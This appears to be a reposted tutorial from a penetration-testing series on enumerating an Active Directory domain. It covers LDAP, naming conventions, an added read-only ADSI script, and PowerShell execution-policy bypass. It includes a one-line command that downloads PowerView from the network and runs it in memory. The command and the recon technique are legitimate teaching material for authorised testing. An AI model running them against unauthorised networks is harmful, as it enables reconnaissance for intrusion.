Nytro

Active Directory Penetration Dojo


Active Directory Penetration Dojo – AD Environment Enumeration -1


Hi everyone, we've discussed the basics of Active Directory and the different servers in AD in previous blog posts of this series. If you have not read them yet, you can find them here in Part 1 and Part 2. We have also covered trust relationships in an AD environment; you can read the post on trust relationships here.

In the current post, we'll discuss how to enumerate an Active Directory domain and map the various entities, trusts, relationships and privileges in it.

A few things to understand:

  • LDAP is the access protocol used by Active Directory, so when you enumerate information from AD, your query is sent to it as an LDAP query.

  • AD relies on DNS as its locator service, which enables clients to locate domain controllers and other hosts in the domain through DNS queries.

  • The AD database is NTDS.DIT.

  • AD supports several naming conventions, such as:
    • User Principal Name (UPN):

      • winsaafman@scriptdotsh.local

    • Distinguished Name (DN), the LDAP name:

      • CN = Common Name
      • OU = Organisational Unit
      • DC = Domain Component
      • For example: CN=winsaafman,DC=corp,DC=scriptdotsh,DC=local

[Screenshot: UPN.png]

  • Any standard domain user can enumerate Active Directory information; there is no need for administrative rights (not even local administrator).
  • We'll be using PowerShell a lot in the enumeration stage. In PowerShell, you get a warning when running scripts because of the execution policy setting. Execution policy is just a way to stop users from accidentally executing scripts. It is not really a security control, because it has built-in bypass parameters (powershell -ExecutionPolicy Bypass), as you can see in the screenshot below:

[Screenshot: powershell_ep1.png]

  • If you don't want to save a PowerShell module on disk and just want to load it directly into memory and run some of its commands, you can do it like this:

    powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1');Get-NetDomain"

Besides -exec Bypass, there are several other ways to evade PowerShell script blocking that are already documented on the internet, so I won't be talking much about that.

We can use ADSI, .NET classes, DSQuery, PowerShell frameworks, CMD, WMI, the AD module, etc. for enumerating Active Directory. In the current blog post, we'll enumerate the domain using the Active Directory PowerShell module and PowerView.
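As an added illustration of the two points above (the DN naming convention, and the fact that a standard domain user can read the domain through LDAP), here is a small script that asks the same question as Get-NetDomain, but through the ADSI / System.DirectoryServices classes rather than PowerView. This is example code written for this post, not code from the original article or from PowerView; it assumes a domain-joined Windows host and an ordinary domain user account.

```powershell
# Added example (not from the original post): read the domain naming context and list its
# domain controllers via ADSI / System.DirectoryServices. Assumes a domain-joined host and an
# ordinary domain user; nothing here requires administrative rights.

# RootDSE is readable by any authenticated user and tells us the domain's naming context.
$rootDse  = [ADSI]"LDAP://RootDSE"
$domainDn = [string]$rootDse.defaultNamingContext   # e.g. DC=corp,DC=scriptdotsh,DC=local

# Split a distinguished name into its RDN components (CN=, OU=, DC=), honouring RFC 4514
# backslash escapes so a CN such as "Smith\, John" is not split at the comma.
function ConvertFrom-DistinguishedName {
    param([Parameter(Mandatory)][string]$Dn)
    $parts = @(); $current = ''; $escaped = $false
    foreach ($ch in $Dn.ToCharArray()) {
        if ($escaped)        { $current += $ch; $escaped = $false }   # keep the escaped char
        elseif ($ch -eq '\') { $escaped = $true }                     # drop the escape itself
        elseif ($ch -eq ',') { $parts += $current; $current = '' }    # unescaped separator
        else                 { $current += $ch }
    }
    if ($current) { $parts += $current }
    foreach ($p in $parts) {
        $type, $value = $p -split '=', 2
        [pscustomobject]@{ Type = $type.Trim().ToUpper(); Value = $value }
    }
}

# The DNS name of the domain is just the DC= components joined with dots.
$domainDns = (ConvertFrom-DistinguishedName $domainDn | Where-Object Type -eq 'DC').Value -join '.'
"Domain: $domainDns ($domainDn)"

# Domain controllers are computer objects with the SERVER_TRUST_ACCOUNT bit (0x2000 = 8192)
# set in userAccountControl; the OID is the LDAP bitwise-AND matching rule.
$searcher = New-Object System.DirectoryServices.DirectorySearcher
$searcher.SearchRoot = [ADSI]"LDAP://$domainDn"
$searcher.Filter     = '(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))'
$searcher.PageSize   = 500
$searcher.PropertiesToLoad.AddRange([string[]]@('dNSHostName', 'operatingSystem', 'distinguishedName'))

foreach ($r in $searcher.FindAll()) {
    $dn   = @($r.Properties['distinguishedname'])[0]
    $ous  = (ConvertFrom-DistinguishedName $dn | Where-Object Type -eq 'OU').Value -join '/'
    "{0,-40} {1,-30} OU: {2}" -f @($r.Properties['dnshostname'])[0], @($r.Properties['operatingsystem'])[0], $ous
}
```

Each LDAP query this script sends is visible on the domain controller as a bind and search by the calling user, which is what makes this kind of enumeration detectable even though it needs no privileges.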

In the discovery phase, we have to analyse many things about the client environment and locate their PII, network architecture, devices, critical business applications, etc., then identify threats to those critical assets and look for misconfigurations, vulnerabilities and weaknesses.

Full article: https://scriptdotsh.com/index.php/2019/01/01/active-directory-penetration-dojo-ad-environment-enumeration-1/
